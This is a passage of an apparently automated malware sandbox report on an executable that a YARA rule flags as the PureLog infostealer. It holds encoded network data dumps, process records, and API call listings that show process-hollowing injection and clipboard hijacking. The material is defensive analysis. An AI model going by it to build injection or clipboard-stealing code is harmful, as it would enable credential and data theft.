y6r5mfyxcty5X6lj9+HpVyg4ZBhJB9GMoyX5NObRMTmoi5urfDFRbwvLmSJk0t/iu0jBCcvxka5DVtsQUuegrjqpqTuM8DSv67lLQqXFmTD5esHZ+YYjK2B0C3EiArMKGnz6+x/EoE6aHhnGFSXN8VsYURifNYDcoeSb90H2E7l67Gm7fINi/vm7iQCnkr0De+vnDillACqnRmv3djYSq9ps6Ciu4zMO2ltrcZSl7jP+CUYuD3EmbOHkvAUAk6C
2025-01-15 17:11:17 UTC	1369	IN	Data Raw: 4b 70 6f 49 39 55 75 50 4e 74 36 59 71 63 46 6e 43 4d 59 2b 42 64 62 36 49 59 78 69 31 50 47 79 61 44 44 49 63 50 59 61 4e 6b 6f 2b 4d 2f 53 55 38 7a 59 75 2b 71 7a 35 2f 57 2b 77 39 69 65 45 50 6d 59 68 67 5a 37 55 74 52 74 6b 45 4d 57 51 62 67 35 4b 51 73 61 6a 61 4e 67 2f 64 75 4c 62 31 46 48 31 5a 6a 58 2f 74 67 32 57 30 39 30 63 4e 37 67 39 5a 68 57 30 47 66 6d 79 6c 6b 70 6e 61 71 64 67 35 48 37 69 70 70 59 6f 4c 51 69 37 43 44 35 65 76 55 49 79 49 59 6a 4c 75 42 30 54 63 52 79 30 6d 47 71 50 70 72 61 4b 72 68 68 67 65 31 74 4b 53 37 79 63 4c 46 63 41 6a 6e 76 74 41 6f 34 5a 6c 44 2b 34 4c 59 36 30 4e 4f 52 63 70 34 4c 65 36 6a 4b 33 2f 42 42 76 38 72 59 71 42 43 55 30 63 7a 54 65 52 2b 57 36 76 67 41 56 31 79 51 74 67 30 67 30 6f 50 57 72 6f 74 4d Data Ascii: KpoI9UuPNt6YqcFnCMY+Bdb6IYxi1PGyaDDIcPYaNko+M/SU8zYu+qz5/W+w9ieEPmYhgZ7UtRtkEMWQbg5KQsajaNg/duLb1FH1ZjX/tg2W090cN7g9ZhW0Gfmylkpnaqdg5H7ippYoLQi7CD5evUIyIYjLuB0TcRy0mGqPpraKrhhge1tKS7ycLFcAjnvtAo4ZlD+4LY60NORcp4Le6jK3/BBv8rYqBCU0czTeR+W6vgAV1yQtg0g0oPWrotM
2025-01-15 17:11:17 UTC	1369	IN	Data Raw: 4f 42 37 38 72 4a 62 30 49 48 64 59 31 53 6d 4a 34 52 44 67 71 42 67 30 79 52 46 45 70 33 74 76 42 51 79 57 71 34 32 31 31 66 46 4f 46 4c 71 46 70 59 4d 6d 58 46 33 42 4c 72 61 50 52 59 32 6c 66 47 37 6d 47 55 50 64 58 6a 77 68 47 6f 4c 6e 73 36 69 58 39 54 31 53 76 36 79 5a 6d 41 73 49 46 65 77 76 35 62 78 75 6b 5a 35 4e 43 64 45 75 53 4b 46 62 45 6a 6b 65 6e 61 6a 47 70 4e 48 37 4e 79 72 35 31 70 54 32 4c 33 77 75 34 67 53 58 6e 32 61 55 71 6b 63 39 78 41 70 43 6e 58 39 73 50 77 79 49 6c 6f 4f 2b 6f 38 77 7a 44 38 36 63 70 59 34 69 63 79 6d 54 46 4f 65 67 56 2b 47 39 52 43 32 79 4a 33 75 41 44 67 67 62 4e 6f 6d 56 67 73 4b 62 2b 51 63 62 77 4c 47 41 70 79 52 7a 48 4f 45 56 68 50 68 4c 70 36 35 6c 4d 73 34 36 48 49 64 79 50 79 73 31 69 34 37 43 68 37 50 Data Ascii: OB78rJb0IHdY1SmJ4RDgqBg0yRFEp3tvBQyWq4211fFOFLqFpYMmXF3BLraPRY2lfG7mGUPdXjwhGoLns6iX9T1Sv6yZmAsIFewv5bxukZ5NCdEuSKFbEjkenajGpNH7Nyr51pT2L3wu4gSXn2aUqkc9xApCnX9sPwyIloO+o8wzD86cpY4icymTFOegV+G9RC2yJ3uADggbNomVgsKb+QcbwLGApyRzHOEVhPhLp65lMs46HIdyPys1i47Ch7P
2025-01-15 17:11:17 UTC	1369	IN	Data Raw: 73 37 33 75 53 74 70 44 39 46 32 67 71 4e 4f 70 70 74 38 4b 4f 30 4d 66 59 68 6b 44 44 49 4b 6d 62 4f 51 73 5a 75 47 49 77 72 46 7a 36 43 7a 43 6d 73 59 2f 43 79 2b 71 30 32 46 6e 6b 55 4c 73 42 4a 53 6a 30 73 51 43 57 2b 31 70 37 36 6e 6f 4f 77 73 44 4f 53 53 2b 4f 73 2f 64 44 7a 41 4d 59 57 50 45 37 53 6f 58 52 4f 75 47 78 36 54 57 6d 78 36 4f 6f 57 56 6b 36 43 51 77 7a 63 50 7a 62 71 70 6a 68 31 52 42 38 77 2f 6f 6f 4a 55 6f 71 34 63 4b 73 34 64 54 36 6f 4a 46 54 73 58 75 6f 57 41 33 71 44 62 4e 42 6d 68 6d 49 43 36 42 6b 38 2b 78 78 37 6b 75 46 4f 52 73 55 51 7a 79 7a 6c 76 32 6e 4e 72 4d 7a 61 41 37 72 79 78 70 6f 49 44 42 2f 4b 4b 67 66 59 6a 44 69 71 66 43 65 62 34 51 62 4c 72 61 44 6a 64 46 48 6a 64 55 58 45 66 46 59 43 30 6f 35 75 6f 6d 41 59 54 Data Ascii: s73uStpD9F2gqNOppt8KO0MfYhkDDIKmbOQsZuGIwrFz6CzCmsY/Cy+q02FnkULsBJSj0sQCW+1p76noOwsDOSS+Os/dDzAMYWPE7SoXROuGx6TWmx6OoWVk6CQwzcPzbqpjh1RB8w/ooJUoq4cKs4dT6oJFTsXuoWA3qDbNBmhmIC6Bk8+xx7kuFORsUQzyzlv2nNrMzaA7ryxpoIDB/KKgfYjDiqfCeb4QbLraDjdFHjdUXEfFYC0o5uomAYT
2025-01-15 17:11:17 UTC	1369	IN	Data Raw: 38 2f 65 6a 37 30 4a 4f 50 33 63 4a 32 46 61 78 44 2f 44 78 4f 35 61 6a 77 4c 45 71 4b 39 78 59 65 55 35 51 67 52 37 38 6d 37 72 54 64 4e 48 65 4e 7a 35 59 68 70 68 5a 4e 70 50 4f 38 78 62 70 34 50 59 7a 31 74 74 37 7a 46 70 59 33 41 55 44 72 6e 70 4b 43 34 4f 46 6b 66 31 33 65 55 6d 32 36 6b 37 56 49 49 72 69 35 6c 75 31 73 73 41 54 6d 2b 6b 36 4f 44 72 38 55 6c 4a 4f 79 31 39 36 6f 62 66 53 66 6c 4c 2b 4f 63 48 4b 43 32 48 7a 79 32 43 57 32 6b 44 6a 56 6c 4e 37 2f 70 78 74 79 67 36 31 52 57 73 73 53 2f 70 7a 70 30 43 2b 34 73 6d 36 59 58 68 65 35 6b 44 39 41 4c 48 62 46 78 44 52 77 78 6e 35 69 7a 72 35 50 76 42 52 4f 7a 74 71 61 4f 43 58 41 57 77 79 4b 4d 69 6d 6d 46 6b 32 6b 2f 73 79 31 36 6a 42 59 58 49 47 44 6f 71 4c 69 51 71 73 6b 71 53 4f 36 75 71 Data Ascii: 8/ej70JOP3cJ2FaxD/DxO5ajwLEqK9xYeU5QgR78m7rTdNHeNz5YhphZNpPO8xbp4PYz1tt7zFpY3AUDrnpKC4OFkf13eUm26k7VIIri5lu1ssATm+k6ODr8UlJOy196obfSflL+OcHKC2Hzy2CW2kDjVlN7/pxtyg61RWssS/pzp0C+4sm6YXhe5kD9ALHbFxDRwxn5izr5PvBROztqaOCXAWwyKMimmFk2k/sy16jBYXIGDoqLiQqskqSO6uq
2025-01-15 17:11:17 UTC	1369	IN	Data Raw: 4b 7a 6e 62 67 2b 56 32 50 72 31 31 71 30 68 52 5a 6e 58 6b 30 48 42 57 2f 37 4b 53 63 6f 73 38 58 53 76 69 48 6c 71 77 63 56 53 6d 51 44 2b 4b 58 45 35 79 32 51 53 61 38 64 47 4b 7a 55 79 77 62 4e 5a 43 73 76 62 43 4c 31 46 6b 79 36 59 71 33 70 69 70 77 57 63 49 79 69 65 46 52 6f 35 31 4e 43 4d 41 38 66 6f 52 59 46 44 73 72 75 4a 43 6a 6f 63 6d 5a 4a 68 6a 76 78 49 6d 79 4a 55 38 6f 6b 52 65 6e 75 52 47 76 6d 47 42 6e 74 53 31 47 32 51 77 49 59 67 79 4c 36 74 79 78 7a 50 52 53 44 39 32 34 74 6f 51 2b 55 31 36 54 43 76 36 65 55 36 54 76 57 51 37 69 4d 55 43 67 42 51 68 67 61 71 61 2b 70 5a 43 6f 78 7a 49 4d 73 35 69 4c 70 67 51 44 57 38 68 73 6f 50 31 68 76 49 35 48 50 4f 38 63 65 74 77 4a 42 6e 35 7a 35 5a 47 34 75 34 76 39 4f 55 75 79 73 71 32 33 4e 31 Data Ascii: Kznbg+V2Pr11q0hRZnXk0HBW/7KScos8XSviHlqwcVSmQD+KXE5y2QSa8dGKzUywbNZCsvbCL1Fky6Yq3pipwWcIyieFRo51NCMA8foRYFDsruJCjocmZJhjvxImyJU8okRenuRGvmGBntS1G2QwIYgyL6tyxzPRSD924toQ+U16TCv6eU6TvWQ7iMUCgBQhgaqa+pZCoxzIMs5iLpgQDW8hsoP1hvI5HPO8cetwJBn5z5ZG4u4v9OUuysq23N1
2025-01-15 17:11:17 UTC	1369	IN	Data Raw: 72 61 70 34 2b 71 39 42 4f 73 45 2b 63 34 6f 4f 59 78 6f 4f 34 2b 36 35 6e 72 54 33 4e 41 76 67 69 72 65 68 45 68 51 48 34 48 43 46 72 55 2b 51 6c 32 34 38 39 67 6c 37 67 57 39 71 42 78 4f 6c 6c 61 53 45 6a 75 34 56 4a 4e 36 37 6f 61 77 57 58 53 2f 75 4d 4a 71 47 59 70 36 47 59 51 2b 33 4d 33 7a 54 64 53 31 6d 49 59 47 37 76 49 69 71 79 7a 6b 5a 77 37 65 57 67 67 74 38 50 75 30 32 67 4c 74 58 76 61 56 38 4f 75 73 30 54 61 39 38 48 53 63 79 35 61 57 32 72 4a 58 58 46 68 6a 6d 75 59 54 35 66 6b 6b 35 35 77 47 6e 6a 32 4f 43 6d 55 78 76 79 7a 35 4d 73 55 67 57 41 68 36 44 74 70 2b 74 75 4d 35 59 42 4d 65 54 6a 34 77 4e 62 43 66 56 4d 5a 47 67 61 5a 69 79 47 51 33 77 42 30 6a 61 56 44 59 66 45 4b 57 5a 70 4b 32 73 35 67 67 57 78 72 53 6c 6d 52 74 36 46 74 4d Data Ascii: rap4+q9BOsE+c4oOYxoO4+65nrT3NAvgirehEhQH4HCFrU+Ql2489gl7gW9qBxOllaSEju4VJN67oawWXS/uMJqGYp6GYQ+3M3zTdS1mIYG7vIiqyzkZw7eWggt8Pu02gLtXvaV8Ous0Ta98HScy5aW2rJXXFhjmuYT5fkk55wGnj2OCmUxvyz5MsUgWAh6Dtp+tuM5YBMeTj4wNbCfVMZGgaZiyGQ3wB0jaVDYfEKWZpK2s5ggWxrSlmRt6FtM
2025-01-15 17:11:17 UTC	1369	IN	Data Raw: 61 66 75 48 6a 6d 77 4f 55 4b 6c 61 41 49 45 59 49 61 78 6d 71 2b 44 6d 41 51 2f 76 34 6e 32 2b 51 56 36 43 4e 38 71 6e 66 35 30 67 4c 4a 67 42 72 45 31 5a 34 5a 48 43 53 51 41 73 36 75 6a 68 63 50 6f 55 54 50 75 73 5a 79 69 4c 57 49 35 34 69 76 73 6c 6b 6d 52 70 6c 42 6d 78 7a 4a 62 73 51 51 4c 5a 54 32 79 70 61 65 44 74 39 51 37 44 63 48 4e 71 72 59 37 64 44 54 52 45 34 54 2f 46 61 57 61 57 53 62 74 48 6b 2b 7a 44 6a 38 49 42 50 36 50 6b 36 69 79 39 52 45 58 38 72 6e 39 39 54 64 77 52 2b 38 68 6e 36 41 55 70 4a 73 59 61 63 68 71 53 49 4e 7a 43 41 6b 4c 67 49 6a 47 76 72 7a 70 56 42 7a 6d 79 4b 4b 7a 64 77 73 74 78 51 69 34 67 58 47 46 72 30 51 59 74 41 39 59 69 48 70 71 41 69 47 46 69 37 4b 4d 74 64 73 45 47 4e 32 35 76 34 55 61 43 79 4b 57 45 70 65 6b Data Ascii: afuHjmwOUKlaAIEYIaxmq+DmAQ/v4n2+QV6CN8qnf50gLJgBrE1Z4ZHCSQAs6ujhcPoUTPusZyiLWI54ivslkmRplBmxzJbsQQLZT2ypaeDt9Q7DcHNqrY7dDTRE4T/FaWaWSbtHk+zDj8IBP6Pk6iy9REX8rn99TdwR+8hn6AUpJsYachqSINzCAkLgIjGvrzpVBzmyKKzdwstxQi4gXGFr0QYtA9YiHpqAiGFi7KMtdsEGN25v4UaCyKWEpek

Target ID:	0
Start time:	12:11:03
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\EZsrFTi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\EZsrFTi.exe"
Imagebase:	0x620000
File size:	376'320 bytes
MD5 hash:	C0A15C8328D0EB6C48C194CA52787560
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1292054697.0000000000622000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:11:04
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\EZsrFTi.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\EZsrFTi.exe"
Imagebase:	0xa0000
File size:	376'320 bytes
MD5 hash:	C0A15C8328D0EB6C48C194CA52787560
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:11:04
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\EZsrFTi.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\EZsrFTi.exe"
Imagebase:	0x110000
File size:	376'320 bytes
MD5 hash:	C0A15C8328D0EB6C48C194CA52787560
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:11:04
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\EZsrFTi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\EZsrFTi.exe"
Imagebase:	0xe50000
File size:	376'320 bytes
MD5 hash:	C0A15C8328D0EB6C48C194CA52787560
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	12:11:04
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 940
Imagebase:	0x10000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	52.9%
Total number of Nodes:	17
Total number of Limit Nodes:	1

Executed Functions

Function 029E8125 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029E8097,029E8087), ref: 029E82BD
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 029E82D0
Wow64GetThreadContext.KERNEL32(00000394,00000000), ref: 029E82EE
ReadProcessMemory.KERNELBASE(00000380,?,029E80DB,00000004,00000000), ref: 029E8312
VirtualAllocEx.KERNELBASE(00000380,?,?,00003000,00000040), ref: 029E833D
TerminateProcess.KERNELBASE(00000380,00000000), ref: 029E835C
WriteProcessMemory.KERNELBASE(00000380,00000000,?,?,00000000,?), ref: 029E8395
WriteProcessMemory.KERNELBASE(00000380,00400000,?,?,00000000,?,00000028), ref: 029E83E0
WriteProcessMemory.KERNELBASE(00000380,?,?,00000004,00000000), ref: 029E841E
Wow64SetThreadContext.KERNEL32(00000394,04EB0000), ref: 029E845A
ResumeThread.KERNELBASE(00000394), ref: 029E8469

Strings

ResumeThread, xrefs: 029E8261
VirtualAlloc, xrefs: 029E81EC
TerminateProcess, xrefs: 029E834C
ress, xrefs: 029E81AF
GetP, xrefs: 029E81A7
GetThreadContext, xrefs: 029E81FF
aryA, xrefs: 029E816B
CreateProcessW, xrefs: 029E81D9
VirtualAllocEx, xrefs: 029E8225
WriteProcessMemory, xrefs: 029E8238
ReadProcessMemory, xrefs: 029E8212
SetThreadContext, xrefs: 029E824B
Load, xrefs: 029E8163

Memory Dump Source

Source File: 00000000.00000002.1489343504.00000000029E7000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29e7000_EZsrFTi.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-232383841
Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction ID: dd8f9a53af97e6ed1d4e6c353387d80ca8eb340dc5a45303052d162c8da5a09e
Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction Fuzzy Hash: 55B1187260064AAFDB60CFA8CC80BDA73A5FF88714F158524EA0DAB351D770FA41CB94

Function 029E82A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029E8097,029E8087), ref: 029E82BD
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 029E82D0
Wow64GetThreadContext.KERNEL32(00000394,00000000), ref: 029E82EE
ReadProcessMemory.KERNELBASE(00000380,?,029E80DB,00000004,00000000), ref: 029E8312
VirtualAllocEx.KERNELBASE(00000380,?,?,00003000,00000040), ref: 029E833D
TerminateProcess.KERNELBASE(00000380,00000000), ref: 029E835C
WriteProcessMemory.KERNELBASE(00000380,00000000,?,?,00000000,?), ref: 029E8395
WriteProcessMemory.KERNELBASE(00000380,00400000,?,?,00000000,?,00000028), ref: 029E83E0
WriteProcessMemory.KERNELBASE(00000380,?,?,00000004,00000000), ref: 029E841E
Wow64SetThreadContext.KERNEL32(00000394,04EB0000), ref: 029E845A
ResumeThread.KERNELBASE(00000394), ref: 029E8469

Strings

TerminateProcess, xrefs: 029E834C

Memory Dump Source

Source File: 00000000.00000002.1489343504.00000000029E7000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29e7000_EZsrFTi.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: TerminateProcess
API String ID: 2440066154-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: 86a30ac89b934eb28bf965007bc93151cb91ae57d63b0d68dda5ef07369ec34a
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: 1E312F72244646ABDB35CF94CC91FEA7365BFC8B15F148508EB09AF380C6B4BA018B94

Function 00CA7138 Relevance: 1.7, APIs: 1, Instructions: 244
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1488256835.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e97e8ee4c7bfd04023cff9ea36a91dac3aa7c5d118da285066dcf973bc14fcf
Instruction ID: 40f504c9eaf2940a4ca96d2849b700f36925200cb7f1cd38d6d84da49db51bf0
Opcode Fuzzy Hash: 1e97e8ee4c7bfd04023cff9ea36a91dac3aa7c5d118da285066dcf973bc14fcf
Instruction Fuzzy Hash: 28A15D70D042599FCB04CFA9D880AEDFFF1BF4A314F29C669E458A7255C334A881CBA4

Non-executed Functions

Function 00CA3CA9 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

4'lq, xrefs: 00CA3D56
4'lq, xrefs: 00CA3D81

Memory Dump Source

Source File: 00000000.00000002.1488256835.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_EZsrFTi.jbxd

Similarity

API ID:
String ID: 4'lq$4'lq
API String ID: 0-1917830556
Opcode ID: 8dc81a809396817880ba37a532e05eb0456a42f6406cc8041c8639517ad3f6f2
Instruction ID: ff8bb7eac0834cd09228aa5f466847950038d46817783babfe31621f8bba10f0
Opcode Fuzzy Hash: 8dc81a809396817880ba37a532e05eb0456a42f6406cc8041c8639517ad3f6f2
Instruction Fuzzy Hash: 3E613A74A042458FDB0AEF7AE98179EBBA3BBC9300F14C179D0189F269EF7559058B50

Function 00CA3CB8 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

4'lq, xrefs: 00CA3D56
4'lq, xrefs: 00CA3D81

Memory Dump Source

Source File: 00000000.00000002.1488256835.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_EZsrFTi.jbxd

Similarity

API ID:
String ID: 4'lq$4'lq
API String ID: 0-1917830556
Opcode ID: 7b4cc61a599bb4d35b69fada99159036e105cf3f24265e8073e32e8bba44d3ae
Instruction ID: 8b45597e244da5ff0c5aec7d775d042a59c684c4700f488a8be3ea0ee858c832
Opcode Fuzzy Hash: 7b4cc61a599bb4d35b69fada99159036e105cf3f24265e8073e32e8bba44d3ae
Instruction Fuzzy Hash: 0C513574A042458FDB09EF7AE98179EBBE3BBC9300F24C139D0189F269EF3459099B50

Function 00CA6CB0 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1488256835.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f43c1afffd4eaf18824eb2b1aaf7c3553a121ace1fea92b41a76a97569b11af
Instruction ID: 2544f517e5e5a1ab34fc3e41378bb4ce5b9b4a5d1927cc61d2cc279d1fbed412
Opcode Fuzzy Hash: 4f43c1afffd4eaf18824eb2b1aaf7c3553a121ace1fea92b41a76a97569b11af
Instruction Fuzzy Hash: EAC17E71E0412A8FCB05CBA8C9856AEFBF2FF49304F288269D455EB245D734ED46CB90

Analysis Process: EZsrFTi.exePID: 7732, Parent PID: 7652COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	42%
Total number of Nodes:	374
Total number of Limit Nodes:	23

Executed Functions

Function 0043A2B0 Relevance: 27.0, APIs: 11, Strings: 4, Instructions: 785
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(?,00000000,00000001,?,00000000), ref: 0043A6DB
SysAllocString.OLEAUT32(8FD18DDE), ref: 0043A775
CoSetProxyBlanket.COMBASE(5715C651,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043A7B3
SysAllocString.OLEAUT32(8FD18DDE), ref: 0043A804
SysAllocString.OLEAUT32(52985C88), ref: 0043A8F6
VariantInit.OLEAUT32(?), ref: 0043A967
VariantClear.OLEAUT32(?), ref: 0043AAAB
SysFreeString.OLEAUT32(?), ref: 0043AACF
SysFreeString.OLEAUT32(?), ref: 0043AAD5
SysFreeString.OLEAUT32(00000000), ref: 0043AAE9

Strings

lnol, xrefs: 0043A3C7
"#, xrefs: 0043A9A1
tF(D, xrefs: 0043A3EC
URSP, xrefs: 0043ABFA

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
String ID: "#$URSP$lnol$tF(D
API String ID: 2485776651-1169441024
Opcode ID: e14678d229c64b028fef8ba7957d335e1bf8f86931af6123ae6456b2055200fa
Instruction ID: 56d32c7a2f7e8a935d4f4ebe3e6b8326856cc1cd26b7aa5aff23d788f715e13e
Opcode Fuzzy Hash: e14678d229c64b028fef8ba7957d335e1bf8f86931af6123ae6456b2055200fa
Instruction Fuzzy Hash: 2742FE72A583408FD314CF29C881B5BBBE2EBC9314F18892DE5D5DB381DA78D805CB96

Function 03941000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 03941032
OpenClipboard.USER32(00000000), ref: 0394103C
GetClipboardData.USER32(0000000D), ref: 0394104C
GlobalLock.KERNEL32(00000000), ref: 0394105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 03941090
GlobalLock.KERNEL32 ref: 039410A0
GlobalUnlock.KERNEL32 ref: 039410C1
EmptyClipboard.USER32 ref: 039410CB
SetClipboardData.USER32(0000000D), ref: 039410D6
GlobalFree.KERNEL32 ref: 039410E3
GlobalUnlock.KERNEL32(?), ref: 039410ED
CloseClipboard.USER32 ref: 039410F3
GetClipboardSequenceNumber.USER32 ref: 039410F9

Memory Dump Source

Source File: 00000004.00000002.2540095947.0000000003941000.00000020.00000800.00020000.00000000.sdmp, Offset: 03940000, based on PE: true

Associated: 00000004.00000002.2539938506.0000000003940000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2540116458.0000000003942000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3940000_EZsrFTi.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 95c62791fbd6349465e270da8408e400fa451c43abc1d23406c560e2a8371932
Instruction ID: 58ea3efde3524e0ea541d5f4ee18b50d0aa977ffd4bfc84db00ceec0c44cd028
Opcode Fuzzy Hash: 95c62791fbd6349465e270da8408e400fa451c43abc1d23406c560e2a8371932
Instruction Fuzzy Hash: E12186356082509BDB207BB2AC09F6AB7BCFF04FC5F080828F985DA154F7618880C7A1

Function 004243A0 Relevance: 18.0, APIs: 2, Strings: 8, Instructions: 486
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00424461
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004244BA

Strings

F)K+, xrefs: 0042492F
fgd, xrefs: 00424542
TU, xrefs: 00424947
ur, xrefs: 00424627
# , xrefs: 0042483D
Q9V;, xrefs: 0042490F
pv, xrefs: 0042462F
y5W7, xrefs: 00424907

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: # $F)K+$Q9V;$TU$pv$ur$y5W7$fgd
API String ID: 237503144-2482526074
Opcode ID: 15881eec6523358e72e2a38f1772edb67c9865b2e4cfb01063704cac48e208fd
Instruction ID: 9b969abbfb61b1180e899b8766ecf73613ac9e1c34624ad5fd4af89b2b200271
Opcode Fuzzy Hash: 15881eec6523358e72e2a38f1772edb67c9865b2e4cfb01063704cac48e208fd
Instruction Fuzzy Hash: F9E1FCB46083509FD310DF25E88126BBBE1FFC6354F44892DE5D58B3A1E7788906CB8A

Function 00435BD0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00435C10
GetSystemMetrics.USER32 ref: 00435C20
DeleteObject.GDI32 ref: 00435C63
SelectObject.GDI32 ref: 00435CB3
SelectObject.GDI32 ref: 00435D0A
DeleteObject.GDI32 ref: 00435D38

Strings

(_C, xrefs: 00435DFC
L_C, xrefs: 00435D99
, xrefs: 00435CE1
GcC, xrefs: 00435DF1

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
